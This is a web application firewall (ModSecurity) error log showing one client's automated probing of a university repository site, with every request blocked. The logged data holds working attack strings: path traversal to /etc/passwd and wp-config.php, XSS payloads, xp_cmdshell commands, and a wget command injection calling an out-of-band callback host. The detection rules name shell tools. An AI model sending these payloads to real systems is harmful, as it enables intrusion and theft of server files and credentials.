[Tue Aug 29 11:45:15.376873 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAfbkwQAAAAZ"]
[Tue Aug 29 11:45:16.413018 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAhrqHMAAAAo"]
[Tue Aug 29 11:45:17.376039 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAhxwmIAAAAv"]
[Tue Aug 29 11:45:17.411230 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAhT3xEAAAAD"]
[Tue Aug 29 11:45:19.374976 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAh4DYYAAAA2"]
[Tue Aug 29 11:45:20.401377 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAfiYucAAAAg"]
[Tue Aug 29 11:45:23.376762 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAhzva4AAAAx"]
[Tue Aug 29 11:45:24.351920 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO135MCo-f0AAAhxwnEAAAAv"]
[Tue Aug 29 11:45:24.390662 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAhhcxUAAAAd"]
[Tue Aug 29 11:45:25.356668 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAhvjW0AAAAs"]
[Tue Aug 29 11:45:25.379534 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135cCo-f0AAAhxwnQAAAAv"]
[Tue Aug 29 11:45:25.422318 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAh13wUAAAAz"]
[Tue Aug 29 11:45:26.378326 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/log/view"] [unique_id "ZO135sCo-f0AAAhgoH4AAAAb"]
[Tue Aug 29 11:45:27.402824 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAhT3yIAAAAD"]
[Tue Aug 29 11:45:28.435151 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAhrqIwAAAAo"]
[Tue Aug 29 11:45:29.425342 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAh3f8MAAAA1"]
[Tue Aug 29 11:45:30.404118 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAhhcx4AAAAd"]
[Tue Aug 29 11:45:31.423724 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO1368Co-f0AAAhxwocAAAAv"]
[Tue Aug 29 11:45:35.496341 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAhrqKIAAAAo"]
[Tue Aug 29 11:45:36.577329 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAib5sEAAAAA"]
[Tue Aug 29 11:45:43.691695 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gmc5zhs5g6dxqj.oast.site found within TX:1: cjmnbitjmimt14dgn26gmc5zhs5g6dxqj.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAfiYxwAAAAg"]
[Tue Aug 29 11:45:47.441583 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAfSWmUAAAAB"]
[Tue Aug 29 11:45:48.545591 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAi0JGcAAAAK"]
[Tue Aug 29 11:45:48.577978 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAhlz7gAAAAi"]
[Tue Aug 29 11:45:50.499757 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-sCo-f0AAAi3ZzoAAAAP"]
[Tue Aug 29 11:45:51.365147 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAhZRhIAAAAG"]
[Tue Aug 29 11:45:56.370034 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAib5vkAAAAA"]
[Tue Aug 29 11:46:01.384086 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAi5uBUAAAAS"]
[Tue Aug 29 11:46:02.363681 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAi2yAcAAAAN"]
[Tue Aug 29 11:46:02.379473 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CsCo-f0AAAhZRi0AAAAG"]
[Tue Aug 29 11:46:02.413142 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAhgoMEAAAAb"]
[Tue Aug 29 11:46:07.417130 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26g4mhpmgdh35b1o.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAib5yIAAAAA"]
[Tue Aug 29 11:46:09.396500 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhZRk8AAAAG"]
[Tue Aug 29 11:46:09.473709 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAi5uDQAAAAS"]
[Tue Aug 29 11:46:09.534738 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAfEB6UAAAAO"]
